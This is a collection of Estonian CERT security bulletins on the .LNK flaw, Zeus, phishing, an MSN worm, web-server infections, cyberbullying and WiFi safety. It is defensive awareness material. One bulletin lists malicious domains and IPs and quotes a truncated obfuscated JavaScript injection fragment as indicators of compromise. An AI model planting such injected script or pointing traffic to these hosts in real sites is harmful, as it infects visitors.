*mainige kohvikus, et eelistaksite parooliga kaitstud WiFit (kindlasti WPA2). Selle korraldamine ei nõua kohvikupidajalt lisakulutusi, küll aga kaitseb teid. Parooliga Wifit ei ole võimalik Firesheep'iga pealt kuulata, isegi kui parool on avalik.

CERT Eesti ülevaated viimase aja küberpahalaste pingutustest internetis on mõeldud IT-huvilistele, kes igapäevaselt end andmeturbesse puutuvaga kursis ei pea hoidma. Kõik teated on saadaval www.ria.ee/turvamelu.

15. juulil avastati Windowsi operatsioonisüsteemis oluline turvaauk, mida kasutades saab arvuti märkamatult pahavaraga nakatada. Sel nädalal avastati esimesed .LNK turvaaugu kaudu nakatunud arvutid ka Eestist.

Olukord on ohtlik, kuna turvaauk, mida erinevad viirused arvutitesse pääsemiseks kasutavad, ei ole hetkel lihtsalt sulgetav. Samuti ei märka kasutaja viirusesse nakatumist ega selle tegevust.

CERT Eesti (Computer Emergency Response Team) infoturbe ekspert Anto Veldre: „Ühiskonna arvutiseerituse taseme tõusuga suureneb ka kahju, mida arvutiviirused inimestele ja ühiskonnale põhjustavad. Viirusi ja pahavara ei saa pidada loodusnähtusteks nagu tormi või põuda, see on e-kriminaalide teadlik tegevus. Eesmärk on nakatada üha rohkem arvuteid, et nende kaudu levitada oma pahavara, rünnata veebisaite ning välja saata rämpsposti - nii suureneb illegaalne sissetulek.“

„Hetkel on Eestis teada mõned süsteemid, kus seda turvaauku on nakatamiseks kasutatud. Samas, kui me arvestame, et seda auku saavad kasutada paljud viirused ja hetkel ei ole selle sulgemiseks häid võimalusi, siis saame järeldada, et turvaauku hakatakse lähitulevikus aktiivselt kasutama“, selgitab Veldre.

Soovitused kasutajatele, et vältida .LNK turvaaugu kaudu viirustesse nakatumist:
1.Seni, kuni Microsoft ei ole avaldanud toote parandusi, laadige endale programm, mis ei luba viirustel .LNK turvaauku arvutisse pääsemiseks kasutada. Hetkel ainukese tasuta saadaoleva programmi leiab siit.
2.Turvaauku kasutav pahavara levitab ennast irdmeedia kaudu – mälupulgad, fotoaparaadid, digitaalsed pildiraamid, telefonid, mälukaardid, CD-plaadid jne. Kuni Microsoft ei ole viga ära parandanud, püüdke irdmeediat mitte kasutada.
3.Pahavara levib ka kirjade ja MSNi teel. Kui teile tuleb kiri, millega on kaasas tundmatu manus, ärge avage seda! Kui teile saadetakse MSNis dokument, mida te ei oota, küsige saatjalt üle, millega on tegu?
4.Oluline on arvutit mitte kasutada administraatori õigustes, vaid teha endale kasutaja. Sellisel juhul on ka viirustel oluliselt väiksemad võimalused arvutis tegutseda.
5.Eestis enamlevinud viirusetõrjeprogrammid leiavad vähemalt osa .LNK viga kasutavatest pahalastest üles. Palun uuendage enda viirusetõrje programme! Oluline on teada, et kui viirus jõudis arvutisse enne viirusetõrje uuendamist, on viirusetõrje juba kahjutuks tehtud. Sellisel juhul tuleb spetsialisti poole pöörduda.
6.Kui te kahtlustate, et teie arvuti on nakatunud, pöörduge kohe IT-spetsialisti poole.

Taustainfo - operatsioonisüsteemis võib olla turvaauk, näiteks hetkel Windowsi operatsioonisüsteemis leiduv .LNK failidega seotud auk. Turvaauk ise ei tee operatsioonisüsteemile ega kasutajale halba. Turvaauk on võimalus, mida kasutades saavad kurjategijad saata arvutisse või serverisse erinevaid viiruseid. Piltlikult võib turvaauku võrrelda majaukse lahti jätmisega. Kõik saavad lahtist ust kasutada ja kurjategijad ise valivad - kes viib ära kodutehnika, kes joonistab seinale graffiti, kes kasutab maja varastatud kraami laona.

Info IT-spetsialistidele ja süsteemiadministraatoritele, mis ei ole kindlasti ammendav, aga teeb elu kergemaks:
Microsoft avaldas 16. juulil probleemi kirjelduse.
On teada et viirus üritab ennast levitada ka Office'i dokumentide kaudu.
Teatud määral aitab kasutajatelt lokaalse administraatori õiguste ära võtmine.
Filtreeri välja e-kirjad zip/exe/lnk/pif manustega.
Hoia viirusetõrjujad aktiivsetena ja keela WebDAV.
Saada kasutajatele ülaltoodud käitumissoovitused edasi.
 

Eile õhtul muutis McAfee viirustõrje automaatne uuendus mitmete asutuste ja firmade Windows XP arvutid töövõimetuks. Intsident tõenäoliselt kodukasutajat ei puuduta - ohustatud olid üksnes tsentraalse viirustõrjega suured süsteemid.

Eile kell viis õhtul Eesti aja järgi tegi McAfee korporatiivkasutajatele kättesaadavaks viirusetõrje uuenduse. See kustutas Windows XP arvutitest süsteemi tööks olulise faili, pidades seda viirusega nakatunuks ning muutes sellega arvuti kasutuskõlbmatuks. Probleem ei ohustanud Windows 7 ja Vista operatsioonisüsteeme ega servereid.

CERT Eesti infoturbe ekspert Anto Veldre sõnul ei ole McAfee Eestis kõige populaarsem viirusetõrje ja loodetavasti pole olukord hull, kuid täpsemalt on probleemi suurust vara hinnata. „Kesköise seisuga oli teada väiksemaid probleeme üksikutes organisatsioonides, kus IT-meeskonnad tegelesid olukorra lahendamisega. Kuivõrd enamik Eesti firmasid ja asutusi lõpetasid töö eile õhtul kell viis, siis on administraatoritel olnud aega, et oma süsteemides vead parandada“, selgitas Veldre.

Probleem puudutab põhiliselt neid suurkasutajaid, kes laadisid uuendused alla esimese tunni-pooleteise jooksul pärast ilmumist. Pihtasaanud arvutil ei tohi lubada restarti teha, muidu muutub taastamine keerukamaks. Juba kannatanud arvutite raviks kulub teatud aeg (10-15 minutit arvuti kohta). Hetkel on saadaval juba uusimad, parandatud uuendused, mis arvuteid ei ohusta.

Tehniline lisainformatsioon.

CERT Eesti kutsub IT-juhte ja turbejuhte teabepäevale, mis toimub 18. märtsil kell 8.30 - 14.00 KuMu Auditooriumis Tallinnas. Üritusele on oodatud ka kõik spetsialistid, kes sisuliselt IT juhtimise või infoturbega tegelevad, vaatamata nende ametinimetusele.

Teabepäeval “Tehtud Eestis||2009||2010” räägime, mis toimus ja tehti aastal 2009 ning mis on tulemas-valmimas aastal 2010.

Päevakava

08:30 registreerimine
09:00 avasõnad
09:15
* KKL - Johannes Kert
* S4A - Toomas Lepik
* 122 tulemüüri vallamajadesse - Margus Kreinin
* ID-kaardi baastarkvara - Hannes Linno
* KIIK - Toomas Viira
10:30 paus

10:45
* MSE - Kaspar Hanni
* Paremad i-valimised kui meil - Sven Heiberg, Arne Ansper
* EstWIN - Margus Püüa
* Küberkuritegevus ja FBI - Kalmer Viska
12:00 paus

12:30
* TLD - Marek-Andres Kauts
* VSR - Aivo Jürgenson
* Suurõppus EUs - Lauri Almann
* Küberjulgeoleku alase rahvusvahelise koostöö areng alates 2007 Eesti rünnakutest: poliitilised ja praktilised algatused - Heli Tiirmaa-Klaar
13:45 lõpusõnad
14:00 lõpp

Registreerida saab ainult ID-kaardiga: https://sim.cert.ee/wiki/eid:events:cert-ee:20100318:reg

Registreeruda saab seni, kuni kohti jätkub. Kuna kohtade arv on piiratud, jätavad korraldajad endale õiguse osalejaid valida.

Üritus toimub Euroopa Liidu Strukturifondide programmi "Infoühiskonna teadlikkuse tõstmine" raames.

Head uut aastat CERT-EE poolt! Uus aasta pole kahjuks väga hästi alanud, sest ei ole saladus, et suuremat sorti veebi kaudu nakatamise laine käib hetkel üle Eesti netimaastiku.

Juba eelmise aasta lõpus täheldasime mõningaid rahutukstegevaid märke, ent praegusel hetkel tundub olukord võtvat juba pandeemia mõõte. Sellega seoses pöördume Eesti IT professionaalide poole palvega suhtuda erilise tähelepanuga kõigesse, mis veebiserveri DocRoot kataloogi jõuab. On see siis seotud sellega, mida arendate ja uploadite klientide arvutitesse või sadade klientide virtuaalkodude majutamisega.

Päevakangelast iseloomustab (NB! nimistu ei ole ammendav):
1. HTML lehele või sagedamini JS failidele obfuskeeritud javaskripti lisamine, lisatud osa algab stringiga "/*GNU GPL*/", näide lisatud
2. obfuskeeritud skript harutab ennast lahti veebiaadressiks, kuhu lehe külastaja "põhidoosi" saama suunatakse, aadressi iseloomustab:
- ebatavaliselt suur tähemärkide arv
- üldtuntud domeeninimede sisaldumine (et kehvast filtrist läbi saada)
- .ru TLD kasutamine
näide: deviantclip-com.altervista.org.bbc-co-uk.theaworld.ru
3. HTTP päring suunatakse pordile 8080
4. meieni jõudnud nimed lahenduvad reeglina IPdeks: 91.121.142.111, 94.23.14.110, 94.23.206.229, 85.25.73.243, 91.121.49.129
5. põhiviiruse allalaadija on piisavalt heasti kirjutatud, et välistada automatiseeritud analüüsi üldtuntud vahenditega, AVd klassifitseerivad kasutaja arvutisse paigaldatud binaarifaili reeglina Bredolabi troojalaseks.

Eesti IT maastikul tegutsejatelt palume me kõrgendatud tähelepanu veebide haldamiseks kasutatava FTP/HTTP liikluse montooringul. Võimaluse korral tasuks juba hallatavad-arendatavad veebilehed üle vaadata ning kindlasti tuleks oma halduseks-arenduseks kasutatavad masinad hoida puhtana pahavarast. Võimaluse korral võiks lisada IDSi kontrollitavasse võrgusegmenti.

Tänud kõigile neile, kes kõike seda juba teevad ning tänu neile, kes seda veel ei ole teinud, aga hakkavad tegema.

NB! Asi esineb Eestis paraku juba massiliselt ja ohustab lihtkasutajat! Täiendavat lugemist antud teemal leiab ka siit: http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/

Mittetäielik näide .js failile lisatud obfuskeeritud javaskriptist:

/*GNU GPL*/ try{window.onload = function(){var Ck46ii1kyo =
document.createElement('s&)c#&$r!)((i!!p#$t@'.replace(/\(|@|\)|\$|\!|&|\^|#/ig,
''));var Ndkpsyeqhxen = 'R5hb66d6f7idj';Ck46ii1kyo.setAttribute('type',
't)!)e&x$!^t((/^j^a$v$#a$^&!s(! /.. edasine eemaldatud ../

Teie,
CERT-EE
Tarmo Randel
tarmo-ät-cert.ee
66 30 254

Mahasadanud lumi ja termomeetrite teist miinuskümmet ründav talveilm on hinge toonud rahuliku jõuluootuse. Paraku on mitmed tormised uudised häirimas meie jõulurahu. Alustame neist olulisemast.

Enamik meist kasutab PDF-dokumentide lugemiseks Adobe Acrobat Reader'it. Äsja jõudis laiema ülduseni teave selle rakenduse järjekordsest veast, mida küberkurjategijad kasutavad oma botnet'idele uute liikemete „värbamisel“. Kuna see turva-auk on seotud JavaScripti toega PDF'des, on viiruste ennetamiseks tõhus meede JavaScript Adobe Readeris üldse välja lülitada. Selleks tuleb Acrobat Readeri seadistuste lehel eemaldada linnuke valiku „Enable Acrobat JavaScript“ eest (seadistuste lehele jõuab Edit -> Preferences -> JavaScript).

Vihje pahadokumendile võib anda see, et avatud dokument sisaldab täiesti suvalist teksti või puudub sisu sootuks. Kui juhtumisi sai siiski nakkust edasiandev PDF avatud, siis tasub järgida tavapärast tõrjerutiini: käia arvuti üle erinevate viirustõrjujatega, võimalusel kasutada IT-professionaalide abi.

Üks pahalane, kes turva-auku kasutades arvutisse ronida võib, on meie eelnevates teadetes peaesinejaks olnud Zeus – rahamaias pahavara(s). Viimasel ajal on seda botnet'i kasutatud krediitkaardi andmete väljapetmiseks. Selleks saadavad nakatunud arvutid välja massiliselt e-kirju, milles palutakse kliendil tühistada krediitkaarditehingud. Selleks on vaja kõigest klikkida linki kirjas, millelt avaneb – üllatus-üllatus – veebileht, kus palutakse sisestada enda krediitkaardi andmed. Ilmselgelt on peale liba-veebilehele andmete sisestamist vaja kaardiomanikul suhelda tõelise pangaga, tõeliste tehingute tühistamiseks.

Rubriigist „uudiseid laiast maailmast“ leiame järjekordse tõestuse inimeste leidlikkusest – nimelt on pahavara levitamisel kasutusele võetud suisa personaalne lähenemine. Ettevõtlikud küberpahalased
helistavad võimalikule ohvrile ja esitlevad endid interneti teenusepakkuja tehnilise toe töötajana. Pahaaimamatu kasutaja juhatatakse veebilehele ning palutakse arvutisse paigaldada seal viidatud
tarkvara ...

Pahavara on läbivaks teemaks valitud põhjusega – infoturbega tegelevate organisatsioonide statistika põhjal on botnet'ide arv selle aasta jooksul jämedalt võttes kahekordistunud. Selle info valguses tasub loota, et kõik Jõuluvana kingikotti jõudnud arvutid on varustet pahalaste tõrjumise vahenditega.

Turvalisi jõule ja säravat aastavahetust,
Sinu CERT Eesti

CERT Eesti tegeleb Eestis toimuvate turvaintsidentide ennetamise, tuvastamise, jälgimise, lahendamise ja ohtudest teavitamisega.

Kui Euroopas puutub uuringute andmetel küberkiusamisega kokku pea iga kümnes 6-8-aastane laps, siis Eestis esineb küberkiusamist kordades rohkem ning üha sagedamini just nooremas eagrupis.

RIA infoturbe eksperdi Anto Veldre sõnul nõuab küberkiusamise vähendamine senisest tihedamat koostööd kodu ja kooli vahel. „Täna oleme olukorras, kus enamus 6–17-aastastest lastest kasutab Eestis internetti. Paraku ei oska lapsed end ohtude eest kaitsta ega mõista, et internetis öeldu ja tehtu teeb samamoodi haiget nagu sõnad ja teod päriselus. Oluline on mõista, et internet on loomulik osa tänapäeva lapse elust. See annab talle võimaluse õppida ja sõpradega suhelda, internetis käitumist tuleb lihtsalt lapsele õpetada,“ räägib Veldre.

„Et küberkiusamine muutub üha tõsisemaks probleemiks, tegeletakse lahenduste leidmisega kõikjal. Näiteks on Inglismaal arendamisel mäng, mis jäljendab erinevaid küberkiusamise juhtumeid ning õpetab lastele, kuidas stressi, pinge ja hirmuga toime tulla, samuti empaatia tähtsust ja teistega arvestamist. Lapsed võtavad mängus kiusamise ohvri nähtamatu sõbra rolli ja püüavad ohvrit aidata täpselt nii hästi ja loovalt, kui nad suudavad,“ tutvustas Veldre mängu.

„Esialgsed tulemused on Warwick'i Ülikooli andmetel positiivsed. Laste emotsionaalne intelligentsus areneb tänu ohvri lohutamisele. Nad saavad paremini aru, milleni kiuslik käitumine internetis võib tegelikult viia.“ märkis ta ja lisas, et ka Eestis võiks sarnase mängu lasteaedade ja algklasside lastele kättesaadavaks teha.

Carnegie Mellon Ülikooli loodud inglisekeelses mängus Carnegie Cadets saavad lapsed õppida, kuidas internetis turvaliselt liigelda.

Paljud küberkiusamise juhtumid saavad võimalikuks halvasti hoitud salasõnadest. Veldre sõnul on üsna tavaline, et sõbrannad avaldavad teineteisele oma paroolid, mis hiljem kurja kasutust leiavad. „Esimene õppetund puudutabki salasõnu ja see tuleks läbida juba kodus. Salasõnu ei tohi avaldada mitte kellelegi, mistõttu pole ka lapsevanemal kohane neid oma võsukestelt välja nõuda. Lisaks peab salasõnu teatud aja vältel vahetama. Oluline on ka see, et eri keskkondade salasõnad ei korduks,“ rääkis Veldre netikiusamise vältimise võimalustest.

Teine ja toetav suund küberkiusamise vähendamiseks on heade internetitavade järjepidev käsitlemine kodus, lasteaias ning koolis. Lapsevanemad ja huvilised saavad rohkem infot veebilehelt www.netiohud.ee

Info Suurbritaanias loodud mängu kohta.

Novembris viib RIA läbi teavitust, mis kutsub lapsevanemaid huvituma lapse tegemistest internetis. Teavitus toimub EL struktuurifondide programmi "Infoühiskonna teadlikkuse tõstmine" raames ja seda rahastab Euroopa Regionaalarengu Fond.

Selle nädala alguses sai CERT vihje Eesti netiavarustes aktiivselt ringiroomavast MSNi "ussist". Pahavara teeb raskesti leitavaks see, et viiruse levitamiseks kasutatav veebilink torgatakse MSNi tavavestluse sekka.

"Inimesed on juba piisavalt teadlikud, et mitte klikkida linke, mis tulevad ingliskeelse sõnumiga "Hey, look at my pictures ...". Emakeelse välksõnumivahetuse sekka pakutav link tundub klikkimiseks oluliselt ohutum," selgitab CERT Eesti infoturbe ekspert Tarmo Randel.

Linki klikkinud said suure tõenäosesega enda arvutisse pahalase, mis korjab paroole, krediitkaardiandmeid ja muud personaalset infot, mida "mustal turul" saaks rahaks teha. Samuti saab kurikael nakatatunud arvutit kasutada "hüppelauana", mille kaudu kuritegusid sooritada.

Kuna turvaprogrammid jäävad selle pahavara tuvastamisega veel jänni, siis peaks lingile klikkinud inimene pöörduma tuttava "patsiga poisi" või IT professionaali poole ning paluma arvuti üle kontrollida. Oskuste ja tahtmise korral võib ta seda loomulikult teha ka ise. Juhised, mis on kõlbulikud järgimiseks nii proffidele kui ka asjaarmastajatele, leiab aadressilt: http://www.ria.ee/turvamelu.

CERT Eesti (Computer Emeregency Response Team) tegeleb Eesti arvutivõrkudes toimuvate turvaintsidentide käsitlemisega ja kasutajate turvateadlikkuse tõstmisega.

Kui Sa kasvõi mõnest reast päris täpselt aru ei saa, siis ära hakka katsetama, vaid kutsu asjatundja appi. Allolev juhend on üks võimalik lahendus, testisime seda Windows XPga.

1. Vaata regeditiga HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman väärtust
2. buudi arvuti näiteks sysresccd pealt (http://www.sysresccd.org/)
3. haagi windowsi failisüsteem külge
4. eemalda registry keys viidatud kohast fail koos kataloogiga (näiteks oli eemaldatav kataloog koos sisuga C:\RECYCLER\S-1-5-21-1816002312-2160057530-645678978-7435)
5. haagi partitsioon lahti
6. reboodi windowsisse
7. kustuta registryst HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman

Eile hakkas levima e-kiri, mis näib paljude tuntud firmade nimel tööd pakkuvat. Kirjas palutakse inimestel lingile klikata, seda tehes saab inimese aga oma arvutisse viiruse. Selge on see, et ükski nendest firmadest sellisel kujul tööd ei paku, veel vähem saadavad nad viirusega nakatunud linke.

CERT Eesti infoturbe ekspert Tarmo Randel räägib: „Masu-aeg sunnib pahavara levitajaid kiirelt võõrkeeli omandama. Alates eilsest täheldati pangakoode ja muud isiklikku infot varastava troojalase Zeus rünnet Eesti elanikele. Nimelt saadeti e-postiaadressidele eestikeelne positiivses noodis kiri, milles pakuti töökoha kaotanutele tasuta võimalust leida töökoht või tõsta kvalifikatsiooni. Kirjas olev veebilink viib võimaliku ohvri spetsiaalselt ette valmistatud veebileheni, millelt kostitatakse külastaja brauserit nakatamise “kokteiliga””.

Randel lisab: „Üks võimalus nakkumist ära tunda on see, et arvuti taaskäivitab end paarikümne sekundi jooksul. Antiviirused pahalast arvutisse paigutavat koodi kahjuks kergesti ära ei tunne - kindlaim viis nakatumist vältida on mitte klikkida kahtlaste e-kirjadega kaasa tulnud linke“.

Kirja tekst ütleb: Ärge kaotage lootust. Tasuta aitame Teil uue tookoha leida. Samuti pakume kvalifikatsiooni tõstmise kursusi. Meie tööandjad: EMT, ELISA, TELE2, MICROSOFT, SYMANTEC ja palju... (järgneb link).

Sügiskuu on saabunud. Viirusekirjutajad, rämpspostitajad ja rahvusvahelised e-pangaröövlid on puhkuselt naasnud. Uues pakendis võlts-Viagra on veelgi odavam, rämpspostiga pommitavad Sind Audiocenter ja Inkassokeskus ning vaene vana tõrjeprogramm leiab Sinu torrentikataloogist üksteist viirust korraga.

CERT Eesti infoturbe ekspert Anto Veldre selgitab „Tegelikult ei soovi e-kurjategijad internetis halba teha - nad tahavad vaid natuke Sinu rahakoti kallal nagistada. Nad isegi ei plaani Sinu kaugast tühjendada kohe ja korraga. Nagu alalhoidlikule põllumehele kohane, sooviksid nad Sind tuluallikana oma laudas pidada kuid ja aastaid. Nakatunud arvuti on suure tulu allikas – lisaks pangakonto tühjendamisele saab selle abil saata rämpsposti, rünnata Gruusiat või häkkida Valge Maja arvuteid. Lisaks hoiustatakse Sinu arvutis mõni tagasihoidlik veebivorm, kuhu petetud naabrid saaksid omi pangakoode sisestada. Vahelduse mõttes võib e-mafiooso oma 10 000-st orjastatud arvutist koosneva armee mõne Eriti Suure Sigaduse sooritamiseks sõbrale päevaks välja rentida“.

Kindlasti saab e-kuritegevuse ohvriks ning oma rahast lahti nii:

1. Vasta Nigeeriast tulnud abipalvele või loteriivõitu pakkuvale kirjale. Tee ettemaks 10% Sulle lubatud summast.
2. Hangi endale ja hoia oma arvutis mõnd salakuulavat pangaviirust (Zeus, Sinowal). Juba paari päeva jooksul märkad asjakohaseid muudatusi oma pangaarvel.
3. Kliki bänneril, mis pakub eriti uut (kuigi tundmatu nimega) viirustõrjet. Kindlasti helista nende tasulisele abitelefonile, kus Sulle selgitatakse, justkui oleks Sinu praegune viirusetõrje vananenud ja tuleks arvutist kohe maha võtta.
4. Kliki mõtlematult läbi kõik lingid, mis sõprade arvutid Sinu MSNi aknasse paiskavad.
5. Kasuta huvitava tarkvara hankimiseks erinevaid P2P keskkondi (e-Mule, LimeWire). Tänapäeval on kuni 30% sealsetest failidest saastunud ning uusim moesuund on pangaviirusega nakatunud key-generator (tead ju küll, see progejupp, mis Sulle litsentsivõtme arvutab). Looduses valitseb tasakaal, arvutiprogrammi pealt kokku hoitud raha kasseerib viirus sinu pangakontolt.
6. Sisenda endale, et CERT Eesti tormihoiatused on kodumaise ulmekirjanduse kõrgeim vorm.

Anto Veldre,
CERT Eesti

Eesti suves, kus päikesega vaheldub vihm, jääb puhkajatel tavaliselt pisut aega tegelemaks virtuaalmaailmas ringirändamisega. Viimane on pärismaailmas rändamisega võrreldes oluliselt soodsam ja kiirem viis kaeda uusi maid ning sõlmida tutvusi. Ometi varitsevad virtuaalmaailma rändureid mitmed ohud - kui ei olda piisavalt tähelepanelik, paneb küberpaharett pihta teie rahakoti või nakatab teie armsa läpaka mõne kurja viirusega.

Viimastel päevadel on meedia tähelepanu juhtinud sagenevatele krediitkaardipettustele. CERT infoturbe ekspert Tarmo Randeli sõnul ei ole suur saladus, et „mustal“ küberturul kaubitsetakse juba aastaid krediitkaardiandmetega ja seda väga suurtes kogustes.

Tekib loomulik küsimus – kuskohast need andmed pärinevad ning mis põhjusel on need kogused nii suured? Selle peamine põhjus on internet - viimast kasutatakse üha rohkem e-kaubanduseks ning internetis krediitkaarti kasutavate kaardiomanike hulk kasvab pidevalt. Kuna suur osa andmetest varastatakse just kasutaja arvutist või interneti teel, siis toome omalt poolt välja mõned soovitused, et krediitkaardi omanikud saaksid riskantseid olukordi teadlikult vältida.

Anna oma kaardiandmeid ainult kohtadesse, mille turvalisuses oled veendunud. Krüpteerimata e-posti või veebivormi puhul ei tea kunagi, kes seda „tee peal“ lugeda võib ning kelleni see lõpuks jõuab. Samuti ei palu pangad mitte kunagi Sul oma andmeid e-kirja teel või kahtlaste veebilehtede kaudu uuendada. Veebipoodide ja hotellide puhul saad alati enne kaardiandmete andmist veenduda, kui usaldusväärne on tehingu teine osapool – otsimootorisse veebipoe või hotelli nime toksimine võtab üksnes mõned sekundid ning võib päästa suuremat sorti peavalust ning rahakaost.

Üks põhjus, miks krediitkaardi andmed kaovad, on hooletu suhtumine arvutis pesitsevasse pahavarasse. Mõned arvutikasutajad ei ole üldse teadlikud pahavaraga seotud ohtudest. Mõned on arvamusel, et keda nende andmed ikka huvitavad. Antiviirusest ja uuendustest keeldujad on tavaliselt kindlad, et kui „täiskasvanute“ veebilehtedel ei käida, siis „pahasid viiruseid“ ei saa endale ega arvutile tulla. On kindel, et kord arvutisse pugenud pahalane varastab vaikselt ja valimatult sisestatud andmeid ning edastab need oma tegelikule peremehele. Kogutud andmed müüakse edasi või kasutatakse neid näiteks netipoest kallite kaupade ostmisel.

Rahvusvahelisel areenil annab kõneainet 4. juulil alanud küberrünne Lõuna-Korea ja USA vastu. Rünnati peamiselt valitsusasutuste lehti ja mõndasid hästituntud veebilehti (näiteks yahoo.com). Huvitav on antud ründel kasutatud tarkvara, mis peale nädalast tegutsemist tegi endale „harakiri“, lõhkudes ühtlasi ka operatsioonisüsteemi kasutaja arvutis, milles ta pesitses. Levis see pahalane teada-tuntud Windowsi turva-auke kasutades. Siit jõuame pea igakordse teemani – hoidke kasutatav operatsioonisüsteem uuendatuna! Selle nädala teisipäev oli taas see päev, mil Microsoft avaldas uuenduste paki, mis muuhulgas parandab ühe praegu aktiivselt pahalaste kasutuses oleva turvavea. Nii et kiirustagem, seltsimehed windowsikasutajad!

„Kui juba jutt pettustele läks - ilmselt ei ole mõtet väga pikalt peatuda mehhaanilise tõlkijaga genereeritud vigases keeles lotovõiduteadetel. Osaluseksperimendi käigus lotovõidu kättesaamiseks saadetud „eestikeelsete“ blankettide täitmisega jäin mina küll hätta – osa kasutatud väljendeid on kas täiesti kontekstivälised või lihtsalt arusaamatud. Tundub, et siinkohal on kurikaelad liigse kliendiõbralikkusega küll endale ise augu kaevanud“, leiab Randel.

Kuuma päikest puhkajatele ja jahedat kontorit töistele soovides,

CERT Eesti
 

See nädal on paikamise nädal. Microsoft avaldas paar päeva tagasi oma toodetele rekordilise koguse paiku. Kodukasutajate on neist väga olulised neli, süsteemihaldurite tööpõld on oluliselt  mitmekesisem. Seega, enne suvepuhkusi lappige kindlasti Windows ja rakendused ära, et arvutipahalaste levitajatel elu natukenegi kibedamaks teha. Microsoftiga samal ajal avaldati parandused ka toodetele Adobe ja Apple.

CERT Eesti infoturbe ekspert Tarmo Randeli sõnul on seoses Apple kasvava populaarsusega sagenenud teated macikasutajatele suunatud pahavarast. "Siinkohal on õige hetk meelde tuletada, et Maci muretsemine ei tähenda automaatselt, et netist tulev oht on teie jaoks kadunud! Mida rohkem „õunu“ kasutajate hulgas levib, seda magusamaks muutuvad pahalastele ka „õunte“ kasutajad s.t. tekib küberkurjategijatel huvi macikasutajatele suunatud pahavara loomiseks", selgitab Randel.

Kasutad sa Mac'i, Linuxit või Windowsi – info kalastajatele pole see oluline. Viimased on vägagi aktiivseks muutunud – ilmselt on vaja suvepuhkuse jaoks raha teenida. Eestlasi puudutab enim vast Paypali kasutajakontode andmete väljapetmine võltslehtedelt. CERT Eesti andmetel on nii mõnigi eestlane oma Paypali konto andmed vabatahtlikult kurikaeltele usaldanud. Sestap tahaks inimestele südamele panna, et nad terake tähelepanelikumad oleks.

Universaalset meetodit, kuidas eraldada võltslehte päriselehest, ei saa anda, sest kurikaelad leiutavad pidevalt uuemaid trikke, kuidas arvutikasutajat petta. Tasub välja tuua kaks asja, mille abil on libalehe tuvastamine lihtsam:
1. veebilehe aadress on tavaliselt ürituse nimega seotud (turvaline www.paypal.com vs ebaturvaline www.greatweb.com/monday/paypal);
2. rahaga seotud andmeid küsiv veebileht peab kasutama HTTPS turvaprotokolli, mis avaldub aadressiribal https:// algusega (tava-aadressitel on aadressiribal http://).

Grilli ja -tšillihooaega ilmestab meie tehnoloogiliseks muutunud igapäevamaailmas WiFi oher tarbimine. Päris mõnus on ju peale grillvorstidel teise külje pööramist libistada läptop põlvedele ja MSNi kaudu sõbrad külla kutsuda. Õues WiFit pakkuvate „purkide“ ülesseadmisel peab peremees jälgima lihtsaid turvareegleid. Ilma turvameetmeid rakendamata oleks igaühe suhtlus MSNis kerge vaevaga pealtkuulatav. Kui tellid seadmed koos ülesseadmisega, siis kindlasti nõua tehnikult, et ta teeks seda turvaliselt. Ise seadistades järgi reegleid - lihtsad turvajuhised koduse WiFi tarvis ja muid häid nõuandeid leiad lehelt http://kaardistajad.wifi.ee/turva.php

Turvalist jaanipäeva soovides,
Sinu CERT

CERT Eesti (Computer Emergency Response Team) on Riigi Infosüsteemide Arenduskeskuse osakond, mis tegeleb Eesti arvutivõrkudes toimuvate turvaintsidentide käsitlemise ja ennetamisega ning kasutajate turvateadlikkuse tõstmisega.

CERT Eesti annab teada, et USA teenusepakkuja eemaldas Swedbanki õngitsuslehe võrgust täna pärastlõunal.

Kuivõrd ei ole teada, kui kaua kurjategijad andmete õngitsemise katseid jätkavad ja kus maailmaosas nad võltsitud pangalehe taasavavad, siis peaks endiselt oma elektroonilise kirjakasti sisuga tutvumisel lähtuma tervest mõistusest.

Kurjategijatel on lihtsameelsetelt raha kätte saamiseks tugev motivatsioon - kui juba mõned õnge lähevad, võib pahalaste ebaseaduslik sissetulek olla märkimisväärne.

Meeldetuletuseks:
 - pangad ei soovi iial teilt veebilehe kaudu teada saada pangakaartide pin koode;
 - inimestega suheldakse reeglina nende emakeeles;
- tasub tähelepanu pöörata veebilehe tegelikule aadressile aadressiribal.

Ründed info kättesaamiseks algasid esmaspäeval, kui inimeste postkastidesse saadeti info, mis meelitas neid sisestama krediitkaardi andmeid Swedbanki libalehele asukohaga Prantsusmaal. Esmaspäevane leht eemaldati koostöös kohalike infoturbe inimestega eile lõuna paiku.

CERT Eesti annab rõõmsalt teada, et Swedbanki kasutajatelt infot õngitseda püüdnud leht on suletud. CERT Eesti infoturbe ekspert Tarmo Randeli sõnul sai CERT info õngitsuslehest täna hommikul peale kella kaheksat. „Firefoxi musta nimekirja jõudis leht keskpäevaks. Selleks ajaks, kui inimestel oli lõuna söödud, oli ka veebileht maha võetud. Koostöös Prantsuse infoturbe inimestega rikkusime pahadel päeva kiirelt ära.“

Tegu on ereda näitega sellest, kuidas kurikaelad oma riskide vähendamiseks hajutasid oma pettus-skeemi erinevate riikide vahel. Rämpskirjad saatis laiali botnet, mis koosneb üle maailma asuvatest nakatunud arvutitest. Kui inimene lingil klikkas, suunati ta lehele, mis asus Prantsusmaal. Õngitsuslehe kujundus oli kopeeritud Leedu Swedbanki kodulehelt.

Randeli sõnul tasub inimestele uuesti südamele panna, et nad postkastist teateid lugedes lähtuksid tervest talupojamõistusest. „Pangad on korduvalt rõhutanud, et nemad enda välja antud paroole tagasi ei taha ja vastavaid ringkirju ei saada.“ Näitlikku juhtumit, mis võib õngitsejate ohvriks saanud inimesega juhtuda, saab näha siit. Samas on ka lihtsad soovitused, kuidas hoiduda viirustest ja info õngitsemise ohvriks langemisest.

Viimasel ajal avalikkuse ette imbunud Microsofti ja Adobe möödalasud on haavatavaks muutnud suure hulga arvuteid.

